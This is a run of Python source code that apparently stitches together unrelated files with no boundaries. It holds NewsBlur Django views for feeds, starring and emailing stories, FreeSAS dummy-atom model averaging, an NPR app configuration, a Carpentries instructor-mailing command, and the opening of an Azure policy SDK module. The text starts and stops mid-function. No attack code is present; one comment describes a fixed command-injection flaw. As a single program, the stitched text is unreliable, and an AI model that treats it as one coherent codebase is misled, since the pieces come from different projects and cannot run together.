    usf = get_object_or_404(UserSubscriptionFolders, user=request.user)

    if new_folder:
        # Create the destination folder, then move into it.
        usf.add_folder(to_folder, new_folder)
        to_folder = new_folder

    usf = usf.move_feeds_by_folder_to_folder(feeds_by_folder, to_folder)

    redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL).publish(
        request.user.username, 'reload:feeds')

    return dict(code=1, folders=json.decode(usf.folders))
    
@login_required
@json.json_view
def add_feature(request):
    """Staff-only: create a new Feature entry from the POSTed form.

    Redirects to the index on success; otherwise returns {'code': -1} as
    JSON. The @json.json_view decorator was missing, so the dict return
    was never converted into an HttpResponse; every other dict-returning
    view in this file carries the decorator.
    """
    if not request.user.is_staff:
        return HttpResponseForbidden()

    form = FeatureForm(request.POST)

    if form.is_valid():
        form.save()
        return HttpResponseRedirect(reverse('index'))

    return dict(code=-1)
    
@json.json_view
def load_features(request):
    """Return a page of Feature entries, dates localized to the user's timezone."""
    user = get_user(request)
    page = max(int(request.REQUEST.get('page', 0)), 0)
    logging.user(request, "~FBBrowse features: ~SBPage #%s" % (page+1))
    # Fetches one row beyond the page of 3 — presumably to signal a next page.
    rows = Feature.objects.all()[page*3:(page+1)*3+1].values()
    return [{
        'description': row['description'],
        'date': localtime_for_timezone(row['date'], user.profile.timezone).strftime("%b %d, %Y"),
    } for row in rows]

@ajax_login_required
@json.json_view
def save_feed_order(request):
    """Persist the user's folder/feed ordering as a raw JSON string."""
    folders = request.POST.get('folders')
    if not folders:
        return {}

    # Test that folders can be JSON decoded before storing the raw payload.
    folders_list = json.decode(folders)
    assert folders_list is not None
    logging.user(request, "~FBFeed re-ordering: ~SB%s folders/feeds" % (len(folders_list)))
    usf = UserSubscriptionFolders.objects.get(user=request.user)
    usf.folders = folders
    usf.save()

    return {}

@json.json_view
def feeds_trainer(request):
    """Return classifier training data for the user's active subscriptions.

    With a feed_id parameter, only that feed is returned (even if already
    trained); otherwise only untrained feeds with recent stories qualify.
    """
    user = get_user(request)
    feed_id = request.REQUEST.get('feed_id')
    classifiers = []
    subs = UserSubscription.objects.filter(user=user, active=True)

    if feed_id:
        feed = get_object_or_404(Feed, pk=feed_id)
        subs = subs.filter(feed=feed)
    subs = subs.select_related('feed').order_by('-feed__stories_last_month')

    for sub in subs:
        if feed_id or (not sub.is_trained and sub.feed.stories_last_month > 0):
            feed_data = sub.feed.data
            classifiers.append({
                'classifiers': get_classifiers_for_user(user, feed_id=sub.feed.pk),
                'feed_id': sub.feed_id,
                'stories_last_month': sub.feed.stories_last_month,
                'num_subscribers': sub.feed.num_subscribers,
                'feed_tags': json.decode(feed_data.popular_tags) if feed_data.popular_tags else [],
                'feed_authors': json.decode(feed_data.popular_authors) if feed_data.popular_authors else [],
            })

    # Opening the trainer counts as having trained intelligence.
    user.profile.has_trained_intelligence = True
    user.profile.save()

    logging.user(user, "~FGLoading Trainer: ~SB%s feeds" % (len(classifiers)))

    return classifiers

@ajax_login_required
@json.json_view
def save_feed_chooser(request):
    # Persist the feed-chooser selection: activate approved feeds and
    # deactivate the rest. Free (non-premium) accounts are capped at 64.
    is_premium = request.user.profile.is_premium
    approved_feeds = [int(feed_id) for feed_id in request.POST.getlist('approved_feeds') if feed_id]
    if not is_premium:
        approved_feeds = approved_feeds[:64]
    activated = 0
    usersubs = UserSubscription.objects.filter(user=request.user)
    
    for sub in usersubs:
        try:
            if sub.feed_id in approved_feeds:
                activated += 1
                if not sub.active:
                    sub.active = True
                    sub.save()
                    if sub.feed.active_subscribers <= 0:
                        # First active subscriber: refresh the feed's counts.
                        sub.feed.count_subscribers()
            elif sub.active:
                sub.active = False
                sub.save()
        except Feed.DoesNotExist:
            # Subscription points at a deleted feed; skip it.
            pass
    
    request.user.profile.queue_new_feeds()
    request.user.profile.refresh_stale_feeds(exclude_new=True)
    
    # Tell connected clients to reload the feed list with the new selection.
    r = redis.Redis(connection_pool=settings.REDIS_PUBSUB_POOL)
    r.publish(request.user.username, 'reload:feeds')
    
    logging.user(request, "~BB~FW~SBFeed chooser: ~FC%s~SN/~SB%s" % (
        activated, 
        usersubs.count()
    ))
    
    return {'activated': activated}

@ajax_login_required
def retrain_all_sites(request):
    """Reset the trained flag on every subscription, then return the trainer payload."""
    for subscription in UserSubscription.objects.filter(user=request.user):
        subscription.is_trained = False
        subscription.save()

    return feeds_trainer(request)
    
@login_required
def activate_premium_account(request):
    # Flip the user to premium: activate every subscription and make sure
    # each feed recounts premium subscribers and fetches promptly.
    try:
        usersubs = UserSubscription.objects.select_related('feed').filter(user=request.user)
        for sub in usersubs:
            sub.active = True
            sub.save()
            if sub.feed.premium_subscribers <= 0:
                sub.feed.count_subscribers()
                sub.feed.schedule_feed_fetch_immediately()
    except Exception, e:
        # Best-effort: report the failure to admins, but still mark the
        # account premium below.
        subject = "Premium activation failed"
        message = "%s -- %s\n\n%s" % (request.user, usersubs, e)
        mail_admins(subject, message, fail_silently=True)
        
    request.user.profile.is_premium = True
    request.user.profile.save()
        
    return HttpResponseRedirect(reverse('index'))

@login_required
def login_as(request):
    """Staff-only impersonation: log the current session in as another user.

    Non-staff access is logged and rejected with a 403. The previous
    implementation used `assert False` before the Forbidden response;
    asserts are stripped under `python -O`, and otherwise the assert made
    the 403 unreachable (raising a 500 instead), so an explicit response
    is returned in every run mode.
    """
    if not request.user.is_staff:
        logging.user(request, "~SKNON-STAFF LOGGING IN AS ANOTHER USER!")
        return HttpResponseForbidden()
    username = request.GET['user']
    user = get_object_or_404(User, username__iexact=username)
    # Django requires a backend attribute before login() without authenticate().
    user.backend = settings.AUTHENTICATION_BACKENDS[0]
    login_user(request, user)
    return HttpResponseRedirect(reverse('index'))
    
def iframe_buster(request):
    """Answer the iframe-busting probe with an empty 204 No Content."""
    logging.user(request, "~FB~SBiFrame bust!")
    return HttpResponse(status=204)

@required_params('story_id', feed_id=int)
@ajax_login_required
@json.json_view
def mark_story_as_starred(request):
    """Star a story addressed by feed_id + story_id."""
    return _mark_story_as_starred(request)
    
@required_params('story_hash')
@ajax_login_required
@json.json_view
def mark_story_hash_as_starred(request):
    """Star a story addressed by its story_hash."""
    return _mark_story_as_starred(request)
    
def _mark_story_as_starred(request):
    # Shared implementation for mark_story_as_starred and
    # mark_story_hash_as_starred: save (or re-tag) a story for the user and
    # keep the per-feed and per-tag starred counts in sync.
    code       = 1
    feed_id    = int(request.REQUEST.get('feed_id', 0))
    story_id   = request.REQUEST.get('story_id', None)
    story_hash = request.REQUEST.get('story_hash', None)
    user_tags  = request.REQUEST.getlist('user_tags')
    message    = ""
    if story_hash:
        story, _   = MStory.find_story(story_hash=story_hash)
        feed_id = story and story.story_feed_id
    else:
        story, _   = MStory.find_story(story_feed_id=feed_id, story_id=story_id)
    
    if not story:
        return {'code': -1, 'message': "Could not find story to save."}
        
    # Copy the raw story document, dropping per-user fields so they can be
    # replaced with this user's values below.
    story_db = dict([(k, v) for k, v in story._data.items() 
                            if k is not None and v is not None])
    story_db.pop('user_id', None)
    story_db.pop('starred_date', None)
    story_db.pop('id', None)
    story_db.pop('user_tags', None)
    now = datetime.datetime.now()
    story_values = dict(starred_date=now, user_tags=user_tags, **story_db)
    params = dict(story_guid=story.story_guid, user_id=request.user.pk)
    starred_story = MStarredStory.objects(**params).limit(1)
    created = False
    removed_user_tags = []
    if not starred_story:
        # First time this user stars this story.
        params.update(story_values)
        starred_story = MStarredStory.objects.create(**params)
        created = True
        MActivity.new_starred_story(user_id=request.user.pk, 
                                    story_title=story.story_title, 
                                    story_feed_id=feed_id,
                                    story_id=starred_story.story_guid)
        new_user_tags = user_tags
        MStarredStoryCounts.adjust_count(request.user.pk, feed_id=feed_id, amount=1)
    else:
        # Already starred: diff the tag sets so the counters below only
        # move for tags actually added or removed.
        starred_story = starred_story[0]
        new_user_tags = list(set(user_tags) - set(starred_story.user_tags or []))
        removed_user_tags = list(set(starred_story.user_tags or []) - set(user_tags))
        starred_story.user_tags = user_tags
        starred_story.save()
    
    for tag in new_user_tags:
        MStarredStoryCounts.adjust_count(request.user.pk, tag=tag, amount=1)
    for tag in removed_user_tags:
        MStarredStoryCounts.adjust_count(request.user.pk, tag=tag, amount=-1)
    
    if random.random() < 0.01:
        # Occasionally schedule a full tag recount to correct drift.
        MStarredStoryCounts.schedule_count_tags_for_user(request.user.pk)
    MStarredStoryCounts.count_for_user(request.user.pk, total_only=True)
    starred_counts, starred_count = MStarredStoryCounts.user_counts(request.user.pk, include_total=True)
    if not starred_count and len(starred_counts):
        # Counts exist but the total is missing; fall back to a direct count.
        starred_count = MStarredStory.objects(user_id=request.user.pk).count()    
    
    if created:
        logging.user(request, "~FCStarring: ~SB%s (~FM~SB%s~FC~SN)" % (story.story_title[:32], starred_story.user_tags))        
    else:
        logging.user(request, "~FCUpdating starred:~SN~FC ~SB%s~SN (~FM~SB%s~FC~SN)" % (story.story_title[:32], starred_story.user_tags))
    
    return {'code': code, 'message': message, 'starred_count': starred_count, 'starred_counts': starred_counts}
    
@required_params('story_id')
@ajax_login_required
@json.json_view
def mark_story_as_unstarred(request):
    """Unstar a story addressed by story_id."""
    return _mark_story_as_unstarred(request)
    
@required_params('story_hash')
@ajax_login_required
@json.json_view
def mark_story_hash_as_unstarred(request):
    """Unstar a story addressed by its story_hash."""
    return _mark_story_as_unstarred(request)

def _mark_story_as_unstarred(request):
    # Shared implementation for the unstar endpoints: find the user's
    # starred copy of the story, detach it, and decrement saved-story counts.
    code     = 1
    story_id = request.POST.get('story_id', None)
    story_hash = request.REQUEST.get('story_hash', None)
    starred_counts = None
    starred_story = None
    
    if story_id:
        starred_story = MStarredStory.objects(user_id=request.user.pk, story_guid=story_id)
    if not story_id or not starred_story:
        # Fall back to a hash lookup (story_id may itself be a hash).
        starred_story = MStarredStory.objects(user_id=request.user.pk, story_hash=story_hash or story_id)
    if starred_story:
        starred_story = starred_story[0]
        logging.user(request, "~FCUnstarring: ~SB%s" % (starred_story.story_title[:50]))
        user_tags = starred_story.user_tags
        feed_id = starred_story.story_feed_id
        MActivity.remove_starred_story(user_id=request.user.pk, 
                                       story_feed_id=starred_story.story_feed_id,
                                       story_id=starred_story.story_guid)
        # Detach rather than delete: reassign to user 0, deleting only when
        # that collides with an existing user-0 copy of the same story.
        starred_story.user_id = 0
        try:
            starred_story.save()
        except NotUniqueError:
            starred_story.delete()
        
        MStarredStoryCounts.adjust_count(request.user.pk, feed_id=feed_id, amount=-1)

        for tag in user_tags:
            try:
                MStarredStoryCounts.adjust_count(request.user.pk, tag=tag, amount=-1)
            except MStarredStoryCounts.DoesNotExist:
                pass
        # MStarredStoryCounts.schedule_count_tags_for_user(request.user.pk)
        MStarredStoryCounts.count_for_user(request.user.pk, total_only=True)
        starred_counts = MStarredStoryCounts.user_counts(request.user.pk)
    else:
        code = -1
    
    return {'code': code, 'starred_counts': starred_counts}

@ajax_login_required
@json.json_view
def send_story_email(request):
    code       = 1
    message    = 'OK'
    story_id   = request.POST['story_id']
    feed_id    = request.POST['feed_id']
    to_addresses = request.POST.get('to', '').replace(',', ' ').replace('  ', ' ').strip().split(' ')
    from_name  = request.POST['from_name']
    from_email = request.POST['from_email']
    email_cc   = is_true(request.POST.get('email_cc', 'true'))
    comments   = request.POST['comments']
    comments   = comments[:2048] # Separated due to PyLint
    from_address = 'share@newsblur.com'
    share_user_profile = MSocialProfile.get_user(request.user.pk)

    if not to_addresses:
        code = -1
        message = 'Please provide at least one email address.'
    elif not all(email_re.match(to_address) for to_address in to_addresses if to_addresses):
        code = -1
        message = 'You need to send the email to a valid email address.'
    elif not email_re.match(from_email):
        code = -1
        message = 'You need to provide your email address.'
    elif not from_name:
        code = -1
        message = 'You need to provide your name.'
    else:
        story, _ = MStory.find_story(feed_id, story_id)
        story   = Feed.format_story(story, feed_id, text=True)
        feed    = Feed.get_by_id(story['story_feed_id'])
        params  = {
            "to_addresses": to_addresses,
            "from_name": from_name,
            "from_email": from_email,
            "email_cc": email_cc,
            "comments": comments,
            "from_address": from_address,
            "story": story,
            "feed": feed,
            "share_user_profile": share_user_profile,
        }
        text    = render_to_string('mail/email_story.txt', params)
        html    = render_to_string('mail/email_story.xhtml', params)
        subject = '%s' % (story['story_title'])
        cc      = None
        if email_cc:
            cc = ['%s <%s>' % (from_name, from_email)]
        subject = subject.replace('\n', ' ')
        msg     = EmailMultiAlternatives(subject, text, 
                                         from_email='NewsBlur <%s>' % from_address,
                                         to=to_addresses, 
                                         cc=cc,
                                         headers={'Reply-To': '%s <%s>' % (from_name, from_email)})
        msg.attach_alternative(html, "text/html")
        try:
            msg.send()
        except boto.ses.connection.ResponseError, e:
            code = -1
            message = "Email error: %s" % str(e)
        logging.user(request, '~BMSharing story by email to %s recipient%s: ~FY~SB%s~SN~BM~FY/~SB%s' % 
                              (len(to_addresses), '' if len(to_addresses) == 1 else 's', 
                               story['story_title'][:50], feed and feed.feed_title[:50]))
        
    return {'code': code, 'message': message}

@json.json_view
def load_tutorial(request):
    """Serve the tutorial payload, or an empty dict once the user finishes it."""
    if not request.REQUEST.get('finished'):
        # The tutorial demonstrates features against the NewsBlur blog feed.
        newsblur_feed = Feed.objects.filter(feed_address__icontains='blog.newsblur.com').order_by('-pk')[0]
        logging.user(request, '~BY~FW~SBLoading Tutorial')
        return {
            'newsblur_feed': newsblur_feed.canonical()
        }

    logging.user(request, '~BY~FW~SBFinishing Tutorial')
    return {}

__author__ = "Guillaume"
__license__ = "MIT"
__copyright__ = "2015, ESRF"

import numpy
from freesas.model import SASModel


class Grid:
    """
    This class is used to create a grid which includes all the input models.

    The grid is a face-centered cubic lattice sized to the spatial extent of
    the input dummy-atom models.
    """
    def __init__(self, inputfiles):
        """
        :param inputfiles: list of pdb files needed for averaging
        """
        self.inputs = inputfiles
        self.size = []           # [xmax, ymax, zmax, xmin, ymin, zmin], set by spatial_extent()
        self.nbknots = None      # number of grid knots, set by make_grid()
        self.radius = None       # radius of each knot, set by calc_radius()
        self.coordknots = []     # (nbknots, 4) array of knot coordinates, set by make_grid()

    def __repr__(self):
        # Guard against printing before make_grid() has run ("%i" % None raises).
        if self.nbknots is None:
            return "Grid (not yet computed)"
        return "Grid with %i knots" % self.nbknots

    def spatial_extent(self):
        """
        Calculate the maximal extent of input models.

        :return self.size: 6-list with x,y,z max and then x,y,z min
        """
        atom_blocks = []
        models_fineness = []
        for inputfile in self.inputs:
            model = SASModel(inputfile)
            atom_blocks.append(model.atoms)
            models_fineness.append(model.fineness)
        mean_fineness = sum(models_fineness) / len(models_fineness)
        # Stack the per-model blocks once instead of numpy.append() per model.
        atoms = numpy.vstack(atom_blocks)

        # Pad the bounding box by the mean fineness on every side.
        coordmin = atoms.min(axis=0) - mean_fineness
        coordmax = atoms.max(axis=0) + mean_fineness
        self.size = [coordmax[0], coordmax[1], coordmax[2],
                     coordmin[0], coordmin[1], coordmin[2]]

        return self.size

    def calc_radius(self, nbknots=None):
        """
        Calculate the radius of each point of a hexagonal close-packed grid,
        knowing the total volume and the number of knots in this grid.

        :param nbknots: number of knots wanted for the grid (default 5000)
        :return radius: the radius of each knot of the grid
        """
        if len(self.size) == 0:
            self.spatial_extent()
        nbknots = 5000 if nbknots is None else nbknots
        xmax, ymax, zmax, xmin, ymin, zmin = self.size
        volume = (xmax - xmin) * (ymax - ymin) * (zmax - zmin)

        # Packing density of close-packed spheres: pi / (3*sqrt(2)).
        density = numpy.pi / (3 * 2 ** 0.5)
        radius = ((3 / (4 * numpy.pi)) * density * volume / nbknots) ** (1.0 / 3)
        self.radius = radius

        return radius

    def make_grid(self):
        """
        Create a grid using the maximal size and the radius previously computed.
        The geometry used is a face-centered cubic lattice (fcc).

        :return knots: 2d-array, coordinates of each dot of the grid. Saved as self.coordknots.
        """
        if len(self.size) == 0:
            self.spatial_extent()
        if self.radius is None:
            self.calc_radius()

        a = numpy.sqrt(2.0) * self.radius    # lattice step

        xmax, ymax, zmax = self.size[0], self.size[1], self.size[2]
        xmin, ymin, zmin = self.size[3], self.size[4], self.size[5]

        def offsets(vmin, vmax):
            # All multiples of the lattice step keeping vmin + offset <= vmax.
            values = []
            v = 0.0
            while (vmin + v) <= vmax:
                values.append(v)
                v += a
            return values

        xlist = offsets(xmin, xmax)
        ylist = offsets(ymin, ymax)
        zlist = offsets(zmin, zmax)

        # Collect rows in a Python list and convert once at the end:
        # numpy.append() inside the loop reallocated the whole array for
        # every knot (quadratic), and required a dummy first row.
        rows = []
        for i, z in enumerate(zlist):
            for j, x in enumerate(xlist):
                # fcc stagger: same-parity (layer, column) pairs use the even
                # y offsets, mixed parity uses the odd ones.
                if (i % 2 == 0) == (j % 2 == 0):
                    ys = ylist[0:-1:2]
                else:
                    ys = ylist[1:-1:2]
                for y in ys:
                    rows.append([xmin + x, ymin + y, zmin + z, 0.0])

        knots = numpy.asarray(rows, dtype="float").reshape(-1, 4)
        self.nbknots = knots.shape[0]
        self.coordknots = knots

        return knots


class AverModels:
    """
    Provides tools to create an averaged model using several aligned dummy atom models.

    Typical workflow: :meth:`read_files` to load the aligned models,
    :meth:`assign_occupancy` to score each grid dot, then :meth:`save_aver`
    to write the averaged model as a pdb file.
    """
    def __init__(self, inputfiles, grid):
        """
        :param inputfiles: list of pdb files of aligned models
        :param grid: 2d-array coordinates of each point of a grid, fourth column full of zeros
        """
        self.inputfiles = inputfiles
        self.models = []   # SASModel instances, filled by read_files()
        self.header = []   # pdb layout lines, filled by make_header()
        self.radius = None
        self.atoms = []
        self.grid = grid

    def __repr__(self):
        return "Average SAS model with %i atoms" % len(self.atoms)

    def read_files(self, reference=None):
        """
        Read all the pdb files in the inputfiles list, creating SASModels.
        The SASModels created are saved in a list; the reference model is the
        first model in the list.

        :param reference: position of the reference model file in the inputfiles list
        :return models: list of SASModel, reference model first
        """
        ref = 0 if reference is None else reference
        inputfiles = self.inputfiles
        # Reference model first, then every other file in original order.
        models = [SASModel(inputfiles[ref])]
        models.extend(SASModel(f) for i, f in enumerate(inputfiles) if i != ref)
        self.models = models

        return models

    def calc_occupancy(self, griddot):
        """
        Assign an occupancy and a contribution factor to a point of the grid.

        Each atom of each model contributes max(1 - d2/fineness, 0) to the
        occupancy, where d2 is the squared atom-dot distance; the contribution
        counts the atoms giving a non-zero term.

        :param griddot: 1d-array, coordinates of a point of the grid
        :return tuple: 2-tuple containing (occupancy, contribution)
        """
        occ = 0.0
        contrib = 0
        dot = numpy.asarray(griddot[0:3], dtype="float")
        for model in self.models:
            # Vectorized over all atoms of the model: the former per-atom
            # Python loop was the hot spot of the whole averaging step.
            delta = model.atoms[:, 0:3] - dot
            dist = (delta * delta).sum(axis=1)
            add = numpy.maximum(1.0 - dist / model.fineness, 0.0)
            contrib += int(numpy.count_nonzero(add))
            occ += float(add.sum())
        return occ, contrib

    def assign_occupancy(self):
        """
        For each point of the grid, total occupancy and contribution factor are computed and saved.
        The grid is then ordered with decreasing value of occupancy.
        The fourth column of the array corresponds to the occupancy of the point and the fifth to
        the contribution for this point.

        :return sortedgrid: 2d-array, coordinates of each point of the grid
        """
        nbknots = self.grid.shape[0]
        # Add a fifth column for the contribution (the occupancy column already exists).
        grid = numpy.append(self.grid, numpy.zeros((nbknots, 1), dtype="float"), axis=1)

        for i in range(nbknots):
            grid[i, 3], grid[i, 4] = self.calc_occupancy(grid[i, 0:3])

        # Sort rows by decreasing occupancy (column 3); sorting that single
        # column and using fancy indexing replaces the former whole-array
        # argsort and per-row copy loop.
        order = numpy.argsort(grid[:, 3])
        sortedgrid = grid[order[::-1]]

        return sortedgrid

    def make_header(self):
        """
        Create the layout of the pdb file for the averaged model.

        :return header: list of lines (comment lines, then one ATOM line per grid dot)
        """
        header = []
        header.append("Number of files averaged : %s\n" % len(self.inputfiles))
        for inputfile in self.inputfiles:
            header.append(inputfile + "\n")
        header.append("Total number of dots in the grid : %s\n" % self.grid.shape[0])

        decade = 1
        for i in range(self.grid.shape[0]):
            line = "ATOM         CA  ASP    1                                    20.00   2 201\n"
            # Atom serial number in columns 7-10.
            line = line[:7] + "%4.i" % (i + 1) + line[11:]
            if not (i + 1) % 10:
                decade += 1  # new residue number every 10 atoms
            # Residue sequence number in columns 21-24.
            line = line[:21] + "%4.i" % decade + line[25:]
            header.append(line)
        self.header = header
        return header

    def save_aver(self, filename):
        """
        Save the position of each occupied dot of the grid, its occupancy and its contribution
        in a pdb file.

        :param filename: name of the pdb file to write
        """
        if len(self.header) == 0:
            self.make_header()
        # Grid must carry occupancy and contribution columns (assign_occupancy).
        assert self.grid.shape[-1] == 5

        nr = 0
        with open(filename, "w") as pdbout:
            for line in self.header:
                if line.startswith("ATOM"):
                    if nr < self.grid.shape[0] and self.grid[nr, 4] != 0:
                        coord = "%8.3f%8.3f%8.3f" % tuple(self.grid[nr, 0:3])
                        occ = "%6.2f" % self.grid[nr, 3]
                        contrib = "%2.f" % self.grid[nr, 4]
                        line = line[:30] + coord + occ + line[60:66] + contrib + line[68:]
                    else:
                        # Unoccupied dot: drop its ATOM line entirely.
                        line = ""
                    nr += 1
                pdbout.write(line)

#!/usr/bin/env python

"""
Project-wide application configuration.

DO NOT STORE SECRETS, PASSWORDS, ETC. IN THIS FILE.
They will be exposed to users. Use environment variables instead.
See get_secrets() below for a fast way to access them.
"""

import os  # NOTE(review): `os` appears unused in this section — presumably used further down (get_secrets?); verify before removing

"""
NAMES
"""
# Project name used for display
PROJECT_NAME = 'quotable'

# Project name in urls
# Use dashes, not underscores!
PROJECT_SLUG = 'quotable'

# The name of the repository containing the source
REPOSITORY_NAME = 'quotable'
REPOSITORY_URL = 'git@github.com:nprapps/%s.git' % REPOSITORY_NAME
REPOSITORY_ALT_URL = None # e.g. 'git@bitbucket.org:nprapps/%s.git' % REPOSITORY_NAME

# The name to be used in paths on the server
PROJECT_FILENAME = 'quotable'

"""
DEPLOYMENT
"""
# Server and S3 buckets that published files are deployed to
FILE_SERVER = 'tools.apps.npr.org'
S3_BUCKET = 'tools.apps.npr.org'
ASSETS_S3_BUCKET = 'assets.apps.npr.org'

# These variables will be set at runtime. See configure_targets() below
DEBUG = True

"""
COPY EDITING
"""
# Key of the Google Doc that holds the editable copy text
COPY_GOOGLE_DOC_KEY = '0AlXMOHKxzQVRdHZuX1UycXplRlBfLVB0UVNldHJYZmc'

"""
SHARING
"""
PROJECT_DESCRIPTION = 'An opinionated project template for (mostly) server-less apps.'
# Canonical public URL of the published project
SHARE_URL = 'http://%s/%s/' % (S3_BUCKET, PROJECT_SLUG)

# Twitter card metadata
TWITTER = {
    'TEXT': PROJECT_NAME,
    'URL': SHARE_URL,
    # Will be resized to 120x120, can't be larger than 1MB
    'IMAGE_URL': ''
}

# Facebook Open Graph metadata
FACEBOOK = {
    'TITLE': PROJECT_NAME,
    'URL': SHARE_URL,
    'DESCRIPTION': PROJECT_DESCRIPTION,
    # Should be square. No documented restrictions on size
    'IMAGE_URL': TWITTER['IMAGE_URL'],
    'APP_ID': '138837436154588'
}

GOOGLE = {
    # Thumbnail image for Google News / Search.
    # No documented restrictions on resolution or size
    'IMAGE_URL': TWITTER['IMAGE_URL']
}

# NPR DFP (ad-serving) targeting parameters
NPR_DFP = {
    'STORY_ID': '203618536',
    'TARGET': 'News_NPR_News_Investigations',
    'ENVIRONMENT': 'NPRTEST',
    'TESTSERVER': 'true'
}

"""
SERVICES
"""
# Google Analytics property ID
GOOGLE_ANALYTICS_ID = 'UA-5828686-4'


import os
import logging

from django.core.management.base import BaseCommand
from django.core.mail import send_mail
from django.template.loader import get_template

from workshops.models import Badge, Person, Role

logger = logging.getLogger()  # root logger — NOTE(review): appears unused in this command; verify before removing


class Command(BaseCommand):
    help = 'Report instructors activity.'

    def add_arguments(self, parser):
        """Register the command-line options understood by this command."""
        parser.add_argument(
            '--send-out-for-real', action='store_true', default=False,
            help='Send information to the instructors.',
        )
        parser.add_argument(
            '--no-may-contact-only', action='store_true', default=False,
            help='Include instructors not willing to be contacted.',
        )
        parser.add_argument(
            '--django-mailing', action='store_true', default=False,
            help='Use Django mailing system. This requires some environmental '
                 'variables to be set, see `settings.py`.',
        )
        parser.add_argument(
            '-s', '--sender', action='store',
            default='workshops@carpentries.org',
            help='E-mail used in "from:" field.',
        )

    def foreign_tasks(self, tasks, person, roles):
        """List of other instructors' tasks, per event."""
        return [
            task.event.task_set.filter(role__in=roles)
                               .exclude(person=person)
                               .select_related('person')
            for task in tasks
        ]

    def fetch_activity(self, may_contact_only=True):
        """Build one activity record per instructor.

        :param may_contact_only: when True (default), skip instructors with
            ``may_contact == False``
        :return: list of dicts with keys 'person', 'lessons',
            'instructor_awards' and 'tasks' (pairs of the person's task and
            the other instructors' tasks on the same event)
        """
        roles = Role.objects.filter(name__in=['instructor', 'helper'])
        instructor_badges = Badge.objects.instructor_badges()

        instructors = Person.objects.filter(badges__in=instructor_badges)
        # A missing e-mail address makes the record unusable.
        instructors = instructors.exclude(email__isnull=True)
        if may_contact_only:
            instructors = instructors.exclude(may_contact=False)

        # let's get some things faster
        instructors = instructors.select_related('airport') \
                                 .prefetch_related('task_set', 'lessons',
                                                   'award_set', 'badges')

        # don't repeat the records
        instructors = instructors.distinct()

        result = []
        for person in instructors:
            tasks = person.task_set.filter(role__in=roles) \
                                   .select_related('event', 'role')
            record = {
                'person': person,
                'lessons': person.lessons.all(),
                'instructor_awards': person.award_set.filter(
                    badge__in=person.badges.instructor_badges()
                ),
                'tasks': zip(tasks,
                             self.foreign_tasks(tasks, person, roles)),
            }
            result.append(record)

        return result

    def make_message(self, record):
        """Render the e-mail body for one activity record."""
        tmplt = get_template('mailing/instructor_activity.txt')
        return tmplt.render(context=record)

    def subject(self, record):
        """Return the e-mail subject for the record."""
        # in future we can vary the subject depending on the record details
        return 'Updating your Software Carpentry information'

    def recipient(self, record):
        """Return the destination address for the record."""
        return record['person'].email

    def send_message(self, subject, message, sender, recipient, for_real=False,
                     django_mailing=False):
        """Send one message (or only log it on a dry run).

        :param for_real: actually send; otherwise only produce verbose output
        :param django_mailing: use Django's mail backend instead of the
            system ``mail`` command
        """
        if for_real:
            if django_mailing:
                send_mail(subject, message, sender, [recipient])

            else:
                import subprocess

                # Pass arguments as a list so no shell is involved: the
                # previous `os.popen('mail -s "..." -r ... ...')` call
                # interpolated the subject and DB-sourced addresses into a
                # shell command line, letting shell metacharacters in them
                # be executed (command injection).
                subprocess.run(
                    ['mail', '-s', subject, '-r', sender, recipient],
                    input=message,
                    universal_newlines=True,
                    check=False,  # keep the old best-effort behaviour: ignore failures
                )

        if self.verbosity >= 2:
            # write only a header
            self.stdout.write('-' * 40 + '\n')
            self.stdout.write('To: {}\n'.format(recipient))
            self.stdout.write('Subject: {}\n'.format(subject))
            self.stdout.write('From: {}\n'.format(sender))
        if self.verbosity >= 3:
            # write whole message out
            self.stdout.write(message + '\n')

    def handle(self, *args, **options):
        """Entry point: fetch activity records and send one message each."""
        # default is dummy run - only actually send mail if told to
        send_for_real = options['send_out_for_real']

        # by default include only instructors who have `may_contact==True`
        no_may_contact_only = options['no_may_contact_only']

        # use mailing options from settings.py or the `mail` system command?
        django_mailing = options['django_mailing']

        # verbosity option is added by Django
        self.verbosity = int(options['verbosity'])

        sender = options['sender']

        results = self.fetch_activity(not no_may_contact_only)

        for result in results:
            message = self.make_message(result)
            subject = self.subject(result)
            recipient = self.recipient(result)
            self.send_message(subject, message, sender, recipient,
                              for_real=send_for_real,
                              django_mailing=django_mailing)

        if self.verbosity >= 1:
            self.stdout.write('Sent {} emails.\n'.format(len(results)))

# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
import warnings

from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from msrest import Serializer

from .. import models as _models
from .._vendor import _convert_request, _format_url_section
T = TypeVar('T')  # generic deserialized-result type used by ClsType
JSONType = Any  # JSON-compatible payload passed as a request body
# Optional per-call callback: receives the pipeline response, the
# deserialized value and the response headers.
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]

_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False  # disable client-side parameter validation

def build_delete_request(
    scope: str,
    policy_assignment_name: str,
    **kwargs: Any
) -> HttpRequest:
    """Build the HTTP DELETE request for a policy assignment at the given scope."""
    api_version = "2016-12-01"
    accept = "application/json, text/json"

    # Fill the path parameters into the URL template.
    url = _format_url_section(
        kwargs.pop("template_url", '/{scope}/providers/Microsoft.Authorization/policyAssignments/{policyAssignmentName}'),
        scope=_SERIALIZER.url("scope", scope, 'str', skip_quote=True),
        policyAssignmentName=_SERIALIZER.url("policy_assignment_name", policy_assignment_name, 'str'),
    )

    # Query string.
    params = kwargs.pop("params", {})  # type: Dict[str, Any]
    params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Headers.
    headers = kwargs.pop("headers", {})  # type: Dict[str, Any]
    headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(method="DELETE", url=url, params=params, headers=headers, **kwargs)


def build_create_request(
    scope: str,
    policy_assignment_name: str,
    *,
    json: JSONType = None,
    content: Any = None,
    **kwargs: Any
) -> HttpRequest:
    """Build the HTTP PUT request that creates a policy assignment at the given scope."""
